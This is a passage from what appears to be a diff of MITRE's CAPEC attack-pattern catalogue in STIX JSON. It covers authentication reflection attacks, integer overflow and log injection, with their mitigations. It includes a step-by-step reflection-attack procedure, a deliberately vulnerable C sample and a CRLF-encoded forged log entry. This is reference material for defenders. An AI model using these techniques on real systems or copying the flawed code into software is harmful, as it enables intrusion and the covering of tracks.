"relationship--0353216d-6356-4c9b-b2ab-5bbc23ae082a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "target_ref": "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--206efa47-ea89-4b09-8d45-dc1df1ea72bc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--286c9aaa-2118-48dc-bce6-6e3f41adc043", + "target_ref": "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b8ab5adf-0b4b-45fd-b053-fad9c99c3106", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9", + "target_ref": "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bb0be5c1-63ea-4146-aec0-793d0f1c8c28", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d9bfea83-be0c-47f2-99c5-56b5812d013b", + "target_ref": 
"attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Apply the latest patches to your user exposed services. This may not be a complete solution, especially against a zero day attack.", + "id": "course-of-action--b576d060-1be3-4588-bdd8-a2b1a4f167ef", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-9-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2dd4206b-b25d-4696-8b9c-de2639f1bb97", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b576d060-1be3-4588-bdd8-a2b1a4f167ef", + "target_ref": "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not unnecessarily expose services.", + "id": "course-of-action--a89aebb1-811d-46e0-b3da-a76bf0ebceda", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-9-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--811c10ed-2d65-4f4d-87e7-31665c01f9bb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"relationship_type": "mitigates", + "source_ref": "course-of-action--a89aebb1-811d-46e0-b3da-a76bf0ebceda", + "target_ref": "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary can abuse an authentication protocol susceptible to reflection attack in order to defeat it. Doing so allows the adversary illegitimate access to the target system, without possessing the requisite credentials. Reflection attacks are of great concern to authentication protocols that rely on a challenge-handshake or similar mechanism. An adversary can impersonate a legitimate user and can gain illegitimate access to the system by successfully mounting a reflection attack during authentication.", + "external_references": [ + { + "external_id": "CAPEC-90", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/90.html" + }, + { + "external_id": "CWE-301", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/301.html" + }, + { + "external_id": "CWE-303", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/303.html" + } + ], + "id": "attack-pattern--229804f0-b017-4a26-937b-159da866bf9a", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Reflection Attack in Authentication Protocol", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2166d3c5-baec-4f42-8284-c1b5b649ad34", + "attack-pattern--2e2ed1f8-f736-4fc9-83bc-308595fc6e03" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Gain Privileges", + "Bypass Protection 
Mechanism", + "Read Data" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_example_instances": [ + "\n A single sign-on solution for a network uses a fixed pre-shared key with its clients to initiate the sign-on process in order to avoid eavesdropping on the initial exchanges.\n An attacker can use a reflection attack to mimic a trusted client on the network to participate in the sign-on exchange.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify service with vulnerable handshake authentication: The adversary must first identify a vulnerable authentication protocol. The most common indication of an authentication protocol vulnerable to reflection attack is when the client initiates the handshake, rather than the server. This allows the client to get the server to encrypt targeted data using the server's pre-shared key.

Experiment

  1. Send challenge to target server: The adversary opens a connection to the target server and sends it a challenge. This challenge is arbitrary and is simply used as a placeholder for the protocol in order to get the server to respond.

  2. Receive server challenge: The server responds by returning the challenge sent encrypted with the server's pre-shared key, as well as its own challenge to the attacker sent in plaintext. We will call this challenge sent by the server \"C\". C is very important and is stored off by the adversary for the next step.

  3. Initiate second handshake: Since the adversary does not possess the pre-shared key, they cannot encrypt C from the previous step in order for the server to authenticate them. To get around this, the adversary initiates a second connection to the server while still keeping the first connection alive. In the second connection, the adversary sends C as the initial client challenge, which rather than being arbitary like the first connection, is very intentional.

  4. Receive encrypted challenge: The server treats the intial client challenge in connection two as an arbitrary client challenge and responds by encrypting C with the pre-shared key. The server also sends a new challenge. The adversary ignores the server challenge and stores the encrypted version of C. The second connection is either terminated or left to expire by the adversary as it is no longer needed.

Exploit

  1. The adversary now posseses the encrypted version of C that is obtained through connection two. The adversary continues the handshake in connection one by responding to the server with the encrypted version of C, verifying that they have access to the pre-shared key (when they actually do not). Because the server uses the same pre-shared key for all authentication it will decrypt C and authenticate the adversary for the first connection, giving the adversary illegitimate access to the target system.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The attacker must have direct access to the target server in order to successfully mount a reflection attack. An intermediate entity, such as a router or proxy, that handles these exchanges on behalf of the attacker inhibits the attackers' ability to attack the authentication protocol." + ], + "x_capec_resources_required": [ + "All that the attacker requires is a means to observe and understand the protocol exchanges in order to reflect the challenges appropriately." + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to have knowledge of observing the protocol exchange and managing the required connections in order to issue and respond to challenges" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The server must initiate the handshake by issuing the challenge. 
This ensures that the client has to respond before the exchange can move any further", + "id": "course-of-action--cf90a75d-b958-4546-b730-3f37189d661d", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-90-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4612e9dd-418b-4c42-9d4f-2534fdc5e72c", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cf90a75d-b958-4546-b730-3f37189d661d", + "target_ref": "attack-pattern--229804f0-b017-4a26-937b-159da866bf9a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The use of HMAC to hash the response from the server can also be used to thwart reflection. The server responds by returning its own challenge as well as hashing the client's challenge, its own challenge and the pre-shared secret. 
Requiring the client to respond with the HMAC of the two challenges ensures that only the possessor of a valid pre-shared secret can successfully hash in the two values.", + "id": "course-of-action--0c139321-7054-4d7b-92ff-f021b5ce6fc0", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-90-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f7753fcf-92fd-495a-8a64-8a0cb4a47728", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0c139321-7054-4d7b-92ff-f021b5ce6fc0", + "target_ref": "attack-pattern--229804f0-b017-4a26-937b-159da866bf9a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Introducing a random nonce with each new connection ensures that the attacker cannot employ two connections to attack the authentication protocol", + "id": "course-of-action--c7b237fe-4455-4bab-afe5-6c3559b98344", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-90-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c6663135-b6d0-4fb2-adb1-200f7f1e01a7", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c7b237fe-4455-4bab-afe5-6c3559b98344", + 
"target_ref": "attack-pattern--229804f0-b017-4a26-937b-159da866bf9a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is contained in the existing attack pattern \"CAPEC-18 : XSS Targeting Non-Script Elements\". Please refer to this other CAPEC going forward.", + "external_references": [ + { + "external_id": "CAPEC-91", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/91.html" + } + ], + "id": "attack-pattern--78cd63b9-a303-4e6b-8460-0270b0e2510b", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: XSS in IMG Tags", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack forces an integer variable to go out of range. The integer variable is often used as an offset such as size of memory allocation or similarly. The attacker would typically control the value of such variable and try to get it out of range. For instance the integer in question is incremented past the maximum possible value, it may wrap to become a very small, or negative number, therefore providing a very incorrect value which can lead to unexpected behavior. 
At worst the attacker can execute arbitrary code.", + "external_references": [ + { + "external_id": "CAPEC-92", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/92.html" + }, + { + "external_id": "CWE-190", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/190.html" + }, + { + "external_id": "CWE-128", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/128.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-122", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/122.html" + }, + { + "external_id": "CWE-196", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/196.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "Integer Overflows", + "external_id": "03", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Integer-Overflows" + }, + { + "description": "J. Viega, G. McGraw, Building Secure Software, 2002, Addison-Wesley", + "external_id": "REF-131", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Robert C. Seacord, SAMATE - Software Assurance Metrics And Tool Evaluation, 2006--05---22, National Institute of Standards and Technology (NIST)", + "external_id": "REF-547", + "source_name": "reference_from_CAPEC", + "url": "http://samate.nist.gov/SRD/view_testcase.php?tID=1511" + }, + { + "description": "Robert C. 
Seacord, Secure Coding in C and C++", + "external_id": "REF-548", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--369d69a3-fb4a-49ac-8999-9b4ecfbf74c6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Forced Integer Overflow", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--1f3b920a-a706-494c-9486-69531a514912" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Integer overflow in the ProcAuWriteElement function in server/dia/audispatch.c in Network Audio System (NAS) before 1.8a SVN 237 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a large max_samples value. See also: CVE-2007-1544", + "\n The following code illustrates an integer overflow. The declaration of total integer as \"unsigned short int\" assumes that the length of the first and second arguments fits in such an integer [REF-547], [REF-548].\n include include include \n int main (int argc, char *const *argv){if (argc !=3){printf(\"Usage: prog_name \\n\");exit(-1);\n }unsigned short int total;total = strlen(argv[1])+strlen(argv[2])+1;char * buff = (char *)malloc(total);strcpy(buff, argv[1]);strcpy(buff, argv[2]);\n }\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. The first step is exploratory meaning the attacker looks for an integer variable that they can control.

Experiment

  1. The attacker finds an integer variable that they can write into or manipulate and try to get the value of the integer out of the possible range.

Exploit

  1. The integer variable is forced to have a value out of range which set its final value to an unexpected value.

  2. The target host acts on the data and unexpected behavior may happen.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The attacker can manipulate the value of an integer variable utilized by the target host.", + "The target host does not do proper range checking on the variable before utilizing it.", + "When the integer variable is incremented or decremented to an out of range value, it gets a very different value (e.g. very small or negative number)" + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow by injecting malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An attacker can simply overflow an integer by inserting an out of range value." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a8ed81c8-ed80-43a6-b0a2-c7ead943f317", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "target_ref": "attack-pattern--369d69a3-fb4a-49ac-8999-9b4ecfbf74c6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Carefully review the service's implementation before making it available to user. 
For instance you can use manual or automated code review to uncover vulnerabilities such as integer overflow.", + "id": "course-of-action--15bb56ee-cdaf-431b-8136-e8cf24a3ca11", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-92-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f3d51c21-4f4c-4136-b351-f5c1b935b7cc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--15bb56ee-cdaf-431b-8136-e8cf24a3ca11", + "target_ref": "attack-pattern--369d69a3-fb4a-49ac-8999-9b4ecfbf74c6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d64dd927-79c3-45ef-948b-e86799536d9d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--286c9aaa-2118-48dc-bce6-6e3f41adc043", + "target_ref": "attack-pattern--369d69a3-fb4a-49ac-8999-9b4ecfbf74c6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Always do bound checking before consuming user input data.", + "id": "course-of-action--875120c6-9f3e-4fed-88f3-1683f497e905", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-92-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": 
"2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--94ebd003-5a86-4654-a505-d70213867164", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--875120c6-9f3e-4fed-88f3-1683f497e905", + "target_ref": "attack-pattern--369d69a3-fb4a-49ac-8999-9b4ecfbf74c6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the log files of the target host. The attacker injects, manipulates or forges malicious log entries in the log file, allowing them to mislead a log audit, cover traces of attack, or perform other malicious actions. The target host is not properly controlling log access. As a result tainted data is resulting in the log files leading to a failure in accountability, non-repudiation and incident forensics capability.", + "external_references": [ + { + "external_id": "CAPEC-93", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/93.html" + }, + { + "external_id": "CWE-117", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/117.html" + }, + { + "external_id": "CWE-75", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/75.html" + }, + { + "external_id": "CWE-150", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/150.html" + }, + { + "description": "J. Viega, G. McGraw, Building Secure Software, 2002, Addison-Wesley", + "external_id": "REF-131", + "source_name": "reference_from_CAPEC" + }, + { + "description": "A. 
Muffet, The night the log was forged", + "external_id": "REF-550", + "source_name": "reference_from_CAPEC", + "url": "http://doc.novsu.ac.ru/oreilly/tcpip/puis/ch10_05.htm" + }, + { + "description": "The OWASP Application Security Desk Reference, 2009, The Open Web Application Security Project (OWASP)", + "external_id": "REF-551", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/index.php/Log_Injection" + }, + { + "description": "Fortify Software, SAMATE - Software Assurance Metrics And Tool Evaluation, 2006--06---22, National Institute of Standards and Technology (NIST)", + "external_id": "REF-552", + "source_name": "reference_from_CAPEC", + "url": "https://samate.nist.gov/SRD/view_testcase.php?tID=1579" + } + ], + "id": "attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Log Injection-Tampering-Forging", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f" + ], + "x_capec_child_of_refs": [ + "attack-pattern--b3eaa7aa-9601-406c-ae82-0a0e2ea16116" + ], + "x_capec_consequences": { + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Dave Nielsen and Patrick Breitenbach PayPal Web Services (aka PHP Toolkit) 0.50, and possibly earlier versions, allows remote attackers to enter false payment entries into the log file via HTTP POST requests to ipn_success.php. 
See also: CVE-2006-0201", + "\n If a user submits the string \"twenty-one\" for val, the following entry is logged:\n INFO: Failed to parse val=twenty-one\n However, if an attacker submits the string\n twenty-one%0a%0aINFO:+User+logged+out%3dbadguy\n the following entry is logged:\n INFO: Failed to parse val=twenty-oneINFO: User logged out=badguy\n Clearly, attackers can use this same mechanism to insert arbitrary log entries.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Application's Log File Format: The first step is exploratory meaning the attacker observes the system. The attacker looks for action and data that are likely to be logged. The attacker may be familiar with the log format of the system.

  2. Techniques
    Determine logging utility being used by application (e.g. log4j)
    Gain access to application's source code to determine log file formats.
    Install or obtain access to instance of application and observe its log file format.

Exploit

  1. Manipulate Log Files: The attacker alters the log contents either directly through manipulation or forging or indirectly through injection of specially crafted input that the target software will write to the logs. This type of attack typically follows another attack and is used to try to cover the traces of the previous attack.

  2. Techniques
    \n Use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry. For example:\n \"%0D%0A[Thu%20Nov%2012%2011:22]:Info:%20User%20admin%20logged%20in\"\n may add the following forged entry into a log file:\n \"[Thu Nov 12 12:11:22]:Info: User admin logged in\"\n Different applications may require different encodings of the carriage return and line feed characters.\n
    \n Insert a script into the log file such that if it is viewed using a web browser, the attacker will get a copy of the operator/administrator's cookie and will be able to gain access as that user. For example, a log file entry could contain\n \n The script itself will be invisible to anybody viewing the logs in a web browser (unless they view the source for the page).\n
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target host is logging the action and data of the user.", + "The target host insufficiently protects access to the logs or logging mechanisms." + ], + "x_capec_skills_required": { + "Low": "This attack can be as simple as adding extra characters to the logged data (e.g. username). Adding entries is typically easier than removing entries.", + "Medium": "A more sophisticated attack can try to defeat the input validation mechanism." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Carefully control access to physical log files.", + "id": "course-of-action--0f8223ee-d815-41b0-8f0f-a9b23de56d8b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-93-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--902d0a46-bb02-4c00-9c12-63139df6d6ca", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0f8223ee-d815-41b0-8f0f-a9b23de56d8b", + "target_ref": "attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not allow tainted data to be written in the log file without prior input validation. 
An allowlist may be used to properly validate the data.", + "id": "course-of-action--89cb136b-4f28-4cf2-a399-ea0e5451cdd1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-93-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--87217e96-f97b-4c88-8e77-1ff3c6f211f9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--89cb136b-4f28-4cf2-a399-ea0e5451cdd1", + "target_ref": "attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d1004a1b-30e7-4057-b6bd-640ad3d2d21c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--08e36a84-cc88-49b9-81f6-7dab06d12023", + "target_ref": "attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use static analysis tools to identify log forging vulnerabilities.", + "id": "course-of-action--4e06b58a-2a51-45d2-84ef-bedcbb654515", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-93-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--65f16c8f-4535-4431-928b-ab9c8d336a93", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4e06b58a-2a51-45d2-84ef-bedcbb654515", + "target_ref": "attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid viewing logs with tools that may interpret control characters in the file, such as command-line shells.", + "id": "course-of-action--7e6b79fb-dad6-48d5-8cf7-178e70577c8a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-93-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eb05b9ba-1c0b-4cf6-a5cf-94af69a17b39", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + 